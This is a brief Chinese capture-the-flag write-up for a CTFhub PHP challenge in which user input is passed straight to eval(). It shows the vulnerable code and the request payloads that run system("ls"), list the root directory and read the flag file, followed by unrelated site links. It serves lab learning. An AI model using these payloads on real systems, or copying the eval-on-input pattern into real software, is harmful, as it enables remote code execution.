CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
LSL666_2 分钟前
4 jQuery、JavaScript 作用域、闭包与 DOM 事件绑定
前端·javascript·html
张较瘦_6 分钟前
SpringBoot3 | SpringBoot中Entity、DTO、VO的通俗理解与实战
java·spring boot·后端
yinuo15 分钟前
前端跨页面通讯终极指南⑤:window.name 用法全解析
前端
小飞侠在吗22 分钟前
vue computed 和 watch
前端·javascript·vue.js
may_一一27 分钟前
docker安装的redis状态一直是restarting
java·redis·docker
yinuo27 分钟前
前端跨页面通讯终极指南④:MessageChannel 用法全解析
前端
zhangyifang_00928 分钟前
Spring中的SPI机制
java·spring
前端布鲁伊38 分钟前
聊聊前端容易翻车的“环境管理”
前端·面试
han_hanker1 小时前
这里使用 extends HashMap<String, Object> 和 类本身定义变量的优缺点
java·开发语言
毕设十刻1 小时前
基于Vue的考勤管理系统8n7j8(程序 + 源码 + 数据库 + 调试部署 + 开发环境配置),配套论文文档字数达万字以上,文末可获取,系统界面展示置于文末
前端·数据库·vue.js
热门推荐
01GitHub 镜像站点02【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)03安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)04智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践05UV安装并设置国内源06BongoCat - 跨平台键盘猫动画工具07React CVE-2025-55182漏洞排查与修复指南08打造高效订单处理!ZKmall开源商城的统一履约中心架构解析09Linux下V2Ray安装配置指南10本地部署阿里最新开源的Z-Image